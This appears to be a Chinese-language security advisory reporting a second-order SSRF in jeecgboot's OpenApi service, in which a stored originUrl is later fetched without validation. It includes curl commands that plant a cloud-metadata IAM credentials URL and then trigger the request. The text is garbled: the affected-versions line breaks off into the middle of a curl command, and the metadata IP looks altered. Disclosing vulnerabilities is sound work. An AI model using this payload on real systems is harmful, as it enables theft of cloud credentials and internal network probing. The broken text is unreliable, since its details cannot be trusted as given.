# [Security] Second-Order SSRF via OpenApi Service in jeecboot_jeecBoot #9554 ## 漏洞概述 在 `jeecboot_jeecBoot` 的 OpenApi 服务中发现了一个二阶服务器端请求伪造(SSRF)漏洞。`/openapi/add` 端点缺乏权限检查和输入验证,允许经过身份验证的用户将恶意内部或云元数据 URL 注入到 `originUrl` 数据库字段中。当随后调用 `/openapi/call/{path}` 端点时,应用程序会检索未验证的 URL,并使用 `restTemplate.exchange()` 发起出站 HTTP 请求。这允许攻击者绕过网络分段、扫描内部网络服务以及提取敏感的云元数据或本地凭据。 ## 影响范围 * **受影响版本**: ' \ -d '{ "name": "AWS Metadata", "requestMethod": "GET", "requestUrl": "aws-meta", "originUrl": "http://100.254.169.254/latest/meta-data/iam/security-credentials/", "status": 1 }' # 2. Trigger SSRF curl -X GET "http://target:8080/openapi/call/aws-meta" \ -H 'X-Access-Token: ' ```